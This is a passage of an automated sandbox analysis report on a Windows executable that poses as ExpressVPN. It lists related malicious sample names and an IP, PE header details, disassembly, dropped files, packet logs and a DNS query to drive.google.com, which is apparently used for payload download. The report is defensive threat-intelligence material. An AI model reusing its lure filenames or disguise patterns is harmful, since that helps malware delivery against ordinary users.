                              • Excluded IPs from analysis (whitelisted): 20.82.19.171, 20.54.122.82, 20.82.210.154, 92.123.195.73, 92.123.195.35, 8.253.207.121, 8.248.135.254, 67.26.137.254, 67.27.157.254, 8.253.207.120, 20.82.209.183, 104.89.32.83, 93.184.221.240
                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, e8652.dscx.akamaiedge.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, crl.root-x1.letsencrypt.org.edgekey.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              18:06:41API Interceptor2552x Sleep call for process: RegAsm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              188.93.227.195FACTURA.exeGet hashmaliciousBrowse
                                Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                  ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                    FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                      COPIA DE PAGO.exeGet hashmaliciousBrowse
                                        orientite.exeGet hashmaliciousBrowse
                                          PO.exeGet hashmaliciousBrowse
                                            DDC50015.exeGet hashmaliciousBrowse
                                              Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                  FACTURA.exeGet hashmaliciousBrowse
                                                    FACTURA.exeGet hashmaliciousBrowse
                                                      seeds.exeGet hashmaliciousBrowse
                                                        Product LIsts.exeGet hashmaliciousBrowse
                                                          FACTURA Y ALBARANES_pdf.exeGet hashmaliciousBrowse
                                                            Scan.exeGet hashmaliciousBrowse
                                                              Ticari Hesap #U00d6zetiniz.exeGet hashmaliciousBrowse
                                                                Struggleres5.exeGet hashmaliciousBrowse
                                                                  BBVA-Confirming Remesas Aceptadas.exeGet hashmaliciousBrowse
                                                                    FACTURA.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLARANET-ASClaraNETLTDGBFACTURA.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      b3astmode.arm7Get hashmaliciousBrowse
                                                                      • 80.168.0.124
                                                                      jew.arm7Get hashmaliciousBrowse
                                                                      • 212.49.223.28
                                                                      sora.arm7Get hashmaliciousBrowse
                                                                      • 89.206.151.169
                                                                      FAKTURA I PARAGONY.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      COPIA DE PAGO.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      sora.armGet hashmaliciousBrowse
                                                                      • 195.102.64.245
                                                                      LSCtJ6YbhBGet hashmaliciousBrowse
                                                                      • 195.102.64.215
                                                                      orientite.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      PO.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      DDC50015.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      UnHAnaAW.x86Get hashmaliciousBrowse
                                                                      • 212.49.223.21
                                                                      yR25n6pfMSGet hashmaliciousBrowse
                                                                      • 195.157.0.198
                                                                      Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      DHL00051021_PDF.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      FACTURA.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      FACTURA.exeGet hashmaliciousBrowse
                                                                      • 188.93.227.195
                                                                      JE91d4cv34Get hashmaliciousBrowse
                                                                      • 81.171.235.227

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      37f463bf4616ecd445d4a1937da06e19Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      UZlg2Sq2pQ.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      DOC 13102021.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Halkbank_Ekstre_20211310_082357_541079.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      ATT10821.htmlGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Delivery note_241493.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Delivery note_241493.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      FACTURA.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      REQUIREMENT.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Statement of Account.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      HUD-Closing-Statement.htmlGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      zrArDsoum0.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Fra FAC-ES101-2107-03806.doc.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      correction HAWB.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      UZWdHg3hWA.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      LBJiq1QBaH.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Statement of Account.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      ZAM#U00d3WIENIE.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33
                                                                      Potvrda narudzbe u prilogu.exeGet hashmaliciousBrowse
                                                                      • 172.217.168.46
                                                                      • 142.250.186.33

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.7425532007658724
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFklyzxBl1fllXlE/zMchbNNX8RolJuRdyo1dlUKlGXJlDdt:kKrzxBlC1hpNMa8Rdy+UKcXP
                                                                      MD5:C8805EE1FA95D91963FA0137107478E7
                                                                      SHA1:C7B149A0038705B4197465A91D7FF3106085C16A
                                                                      SHA-256:6F1E7DF9E5826469C342D23B1D392E430AA0720FD89DDEF8DEB4CED7036E983A
                                                                      SHA-512:007C1C9EB7A2E24593C3F6CB1A1004608AB9901C9032E04EFA6FEAC3891B22DE050BD5DE5AFC74A9945500CDBA8D48602CCCE487727786B69CD21CC91D155CF4
                                                                      Malicious:false
                                                                      Preview: p...... ........A.D.l...(....................................................... ..........~....k..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                                                      \Device\ConDrv
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):30
                                                                      Entropy (8bit):3.964735178725505
                                                                      Encrypted:false
                                                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                      MD5:9F754B47B351EF0FC32527B541420595
                                                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                      Malicious:false
                                                                      Preview: NordVPN directory not found!..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):5.844997038967016
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:ZAM#U00d3WIENIE.exe
                                                                      File size:98304
                                                                      MD5:4805bfc9145d8aa3ac43d1cc29c451ed
                                                                      SHA1:7787fa250b35d1a67142d230cbedbc357eb8cb9c
                                                                      SHA256:bac5da263610272c5c5be4ecb5a16626c653a757abaffc8402d210227ec04bb8
                                                                      SHA512:493487b0fc72108bc8669cd981f8b226956c63e5098addb36b88a2a78f6f120d785dd35c1e44f37c1ad7a1656ac7769fb7ebf4ce4c5864b6789496326d684792
                                                                      SSDEEP:1536:tlDO6+ecV15gr1zsaZMkKfsw1yNbmPsQTz5It5W3gVARkD:tlRwVLgr1zsa4qSkAI/WwVARk
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L.....7W.................@...0...............P....@........

                                                                      File Icon

                                                                      Icon Hash:69e1c892f664c884

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4012b4
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x5737ACED [Sat May 14 22:55:41 2016 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:3d3cd1bd8dcc611a5734bf41f4e1a6a6

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push 00410938h
                                                                      call 00007F2CCC58EED3h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      xor byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      inc eax
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add bh, ah
                                                                      iretd
                                                                      push esi
                                                                      scasb
                                                                      scasd
                                                                      out 05h, eax
                                                                      inc ebp
                                                                      mov bh, 98h
                                                                      out 42h, eax
                                                                      daa
                                                                      in al, dx
                                                                      fld qword ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx+6Dh], cl
                                                                      insd
                                                                      popad
                                                                      outsb
                                                                      imul esp, dword ptr [esi+65h], 656E7473h
                                                                      jnc 00007F2CCC58EF55h
                                                                      cmp dword ptr [eax], eax
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      dec esp
                                                                      xor dword ptr [eax], eax
                                                                      cmp byte ptr [ebp+137AFA88h], bl
                                                                      out E1h, eax
                                                                      inc edi
                                                                      lodsb

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x145340x28.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c3a.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000xf0.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x139280x14000False0.517761230469data6.30128676097IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .data0x150000xcc40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x160000x1c3a0x2000False0.346923828125data3.69728781195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      CUSTOM0x1793c0x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsEnglishUnited States
                                                                      CUSTOM0x1707e0x8beMS Windows icon resource - 1 icon, 32x32, 8 bits/pixelEnglishUnited States
                                                                      CUSTOM0x16d800x2feMS Windows icon resource - 1 icon, 32x32, 16 colors, 4 bits/pixelEnglishUnited States
                                                                      RT_ICON0x164d80x8a8data
                                                                      RT_GROUP_ICON0x164c40x14data
                                                                      RT_VERSION0x161a00x324dataEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0409 0x04b0
                                                                      LegalCopyrightExpressVPN
                                                                      InternalNamefamiliegruppers
                                                                      FileVersion4.00
                                                                      CompanyNameExpressVPN
                                                                      LegalTrademarksExpressVPN
                                                                      CommentsExpressVPN
                                                                      ProductNameExpressVPN
                                                                      ProductVersion4.00
                                                                      FileDescriptionExpressVPN
                                                                      OriginalFilenamefamiliegruppers.exe

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 13, 2021 18:06:29.913885117 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:29.913970947 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:29.914195061 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:29.931155920 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:29.931226015 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:29.988267899 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:29.988500118 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:29.991051912 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:29.991312027 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.118272066 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.118284941 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.118442059 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.118628979 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.123997927 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.165992975 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.654314041 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.654494047 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.654711962 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.654743910 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.654764891 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.654820919 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.654905081 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.655046940 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.659930944 CEST49795443192.168.11.20172.217.168.46
                                                                      Oct 13, 2021 18:06:30.660016060 CEST44349795172.217.168.46192.168.11.20
                                                                      Oct 13, 2021 18:06:30.757770061 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.757844925 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.758025885 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.758483887 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.758534908 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.812061071 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.812263966 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.815007925 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.815249920 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.819392920 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.819432974 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.820053101 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:30.820241928 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.820597887 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:30.861923933 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.136043072 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.136226892 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.136528969 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.136699915 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.136723995 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.137362003 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.137599945 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.138690948 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.138912916 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.138947010 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.139149904 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.141038895 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.141313076 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.143846035 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.144117117 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.146698952 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.146969080 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.147010088 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.147106886 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.147229910 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.147260904 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.147303104 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.147448063 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.147667885 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.148195028 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.148243904 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.148603916 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.148833036 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.148873091 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.148984909 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.149246931 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.149353981 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.149382114 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.149476051 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.149612904 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.149977922 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.150182009 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.150216103 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.150361061 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.150675058 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.150859118 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.150892019 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.151124954 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.151458025 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.151633024 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.151665926 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.151835918 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.152167082 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.152362108 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.152395010 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.152539968 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.152859926 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.153088093 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.153116941 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.153394938 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.153652906 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.153950930 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.153980017 CEST44349796142.250.186.33192.168.11.20
                                                                      Oct 13, 2021 18:06:31.154268026 CEST49796443192.168.11.20142.250.186.33
                                                                      Oct 13, 2021 18:06:31.154453039 CEST44349796142.250.186.33192.168.11.20

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 13, 2021 18:06:29.867779970 CEST5540553192.168.11.201.1.1.1
                                                                      Oct 13, 2021 18:06:29.899198055 CEST53554051.1.1.1192.168.11.20
                                                                      Oct 13, 2021 18:06:30.711040974 CEST5993453192.168.11.201.1.1.1
                                                                      Oct 13, 2021 18:06:30.756206989 CEST53599341.1.1.1192.168.11.20
                                                                      Oct 13, 2021 18:08:06.955739021 CEST5971753192.168.11.201.1.1.1
                                                                      Oct 13, 2021 18:08:07.063858986 CEST53597171.1.1.1192.168.11.20
                                                                      Oct 13, 2021 18:08:14.191606045 CEST5878053192.168.11.201.1.1.1

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Oct 13, 2021 18:06:29.867779970 CEST192.168.11.201.1.1.10xb7c6Standard query (0)drive.google.comA (IP address)IN (0x0001)
